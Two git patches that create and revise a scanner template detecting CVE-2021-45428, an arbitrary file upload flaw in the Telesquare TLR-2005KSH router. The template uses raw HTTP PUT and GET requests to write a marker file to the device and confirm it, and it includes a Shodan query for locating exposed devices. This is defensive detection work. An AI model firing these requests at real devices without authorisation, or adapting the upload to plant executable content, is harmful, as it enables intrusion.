From 7e811151b5602369ce1c7d5d9344b4677f5eb964 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 19 May 2022 08:38:13 +0900 Subject: [PATCH 1/2] Create CVE-2021-45428.yaml TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-45428.yaml | 45 +++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 cves/2021/CVE-2021-45428.yaml diff --git a/cves/2021/CVE-2021-45428.yaml b/cves/2021/CVE-2021-45428.yaml new file mode 100644 index 0000000000..d4c5d9984f --- /dev/null +++ b/cves/2021/CVE-2021-45428.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-45428 + +info: + name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload + author: gy741 + severity: critical + description: TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-45428 + - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing + - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45428 + cwe-id: CWE-639 + metadata: + shodan-query: http.html:"TLR-2005KSH" + verified: "true" + tags: cve,cve2021,telesquare + +requests: + - raw: + - | + GET /nuclei.txt HTTP/1.1 + Host: {{Hostname}} + + - | + PUT /nuclei.txt HTTP/1.1 + Host: {{Hostname}} + + nuclei + + - | + GET /nuclei.txt HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 404 && status_code_2 == 201 && status_code_3 == 200" + +# Enhanced by mp on 2022/05/19 From 8cc82f868eac38bfa031610242cc04c9c81955fd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 20 May 2022 00:44:47 +0530 Subject: [PATCH 2/2] Update CVE-2021-45428.yaml --- cves/2021/CVE-2021-45428.yaml | 21 ++++++++++++--------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-45428.yaml b/cves/2021/CVE-2021-45428.yaml index d4c5d9984f..2d5d7b0404 100644 --- a/cves/2021/CVE-2021-45428.yaml +++ b/cves/2021/CVE-2021-45428.yaml @@ -4,35 +4,36 @@ info: name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload author: gy741 severity: critical - description: TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + description: | + TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-45428 - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-45428 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-45428 cwe-id: CWE-639 metadata: + verified: true shodan-query: http.html:"TLR-2005KSH" - verified: "true" - tags: cve,cve2021,telesquare + tags: cve,cve2021,telesquare,intrusive,fileupload requests: - raw: - | - GET /nuclei.txt HTTP/1.1 + GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - | - PUT /nuclei.txt HTTP/1.1 + PUT /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - nuclei + CVE-2021-45428 - | - GET /nuclei.txt HTTP/1.1 + GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} req-condition: true @@ -40,6 +41,8 @@ requests: matchers: - type: dsl dsl: - - "status_code_1 == 404 && status_code_2 == 201 && status_code_3 == 200" + - 'status_code_1 == 404 && status_code_2 == 201' + - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' + condition: and # Enhanced by mp on 2022/05/19